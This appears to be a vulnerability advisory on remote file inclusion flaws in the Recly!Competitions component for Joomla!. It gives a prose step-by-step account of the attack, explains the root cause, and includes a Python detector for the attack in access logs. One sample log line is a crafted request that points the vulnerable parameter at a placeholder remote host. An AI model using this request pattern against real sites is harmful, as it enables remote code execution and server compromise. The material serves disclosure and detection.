Multiple PHP remote file inclusion vulnerabilities in the Recly!Competitions (com_competitions) component 1.0 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) add.php and (b) competitions.php in includes/competitions/, and the (2) mosConfig_absolute_path parameter to (c) includes/settings/settings.php.
The Recly!Competitions (com_competitions) component 1.0 for Joomla! contains multiple remote file inclusion (RFI) vulnerabilities. Attackers can leverage these flaws to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Payload Preparation: The attacker crafts a malicious PHP script and hosts it on a publicly accessible server. This script contains the attacker's desired commands, such as a web shell or code to steal sensitive information.
Step 2: Crafting the Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL targets one of the vulnerable files (add.php, competitions.php, or settings.php) and includes the URL of the attacker's malicious PHP script within the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameter.
Step 3: Exploitation: The attacker sends the crafted URL to the vulnerable Joomla! website. This can be done through a web browser or automated tools.
Step 4: Code Execution: The vulnerable PHP file receives the attacker's URL as input. Due to the lack of input validation, the file attempts to include the attacker's malicious PHP script using the provided URL. The attacker's code is then executed on the server.
Step 5: System Compromise: The attacker's malicious code executes, allowing them to gain control of the web server. This can include uploading files, executing commands, accessing sensitive data, and potentially gaining access to the underlying operating system.
The vulnerability stems from insufficient input validation and sanitization within the Recly!Competitions component. Specifically, the component does not validate the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters before using them to build the path of a file to include. This allows an attacker to inject a URL pointing to a PHP script hosted on a remote server. When the vulnerable component includes this URL, the attacker's PHP code is executed within the context of the web server, granting them control over the server's resources. The root cause is a lack of secure coding practices, specifically the absence of proper input validation and output encoding. The core flaw is the use of include or require statements on a request-supplied value without proper sanitization.
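A detection check for the request pattern described above, added here as an example and not part of the original advisory or the component's code. It scans web server access-log lines for requests to the three listed scripts that carry either parameter. The combined log format, the function name classify, and all sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths and parameter names as listed in the advisory.
SCRIPTS = (
    "includes/competitions/add.php",
    "includes/competitions/competitions.php",
    "includes/settings/settings.php",
)
PARAMS = {"GLOBALS[mosConfig_absolute_path]", "mosConfig_absolute_path"}

# Request line of a combined-format access log (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme, as opposed to a filesystem path.
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)


def classify(log_line):
    """Return None, 'param-supplied' or 'remote-url' for one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    path = unquote(target.path).lower()
    if not any(path.endswith("/" + s) for s in SCRIPTS):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so GLOBALS%5B...%5D matches too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name in PARAMS:
            if URL_VALUE.match(value):
                return "remote-url"
            # A client has no reason to set this configuration path at all.
            verdict = "param-supplied"
    return verdict


# Constructed sample lines: addresses, hosts and the /app/ prefix are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /app/includes/competitions/add.php'
    '?GLOBALS%5BmosConfig_absolute_path%5D=http://files.example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/includes/settings/settings.php'
    '?mosConfig_absolute_path=/var/www/app HTTP/1.1" 200 128',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /app/index.php'
    '?option=com_competitions HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line.split('"')[1])
```

A 'param-supplied' result is worth reviewing even without a URL value, because the parameter names a server-side configuration path that a legitimate client never sends.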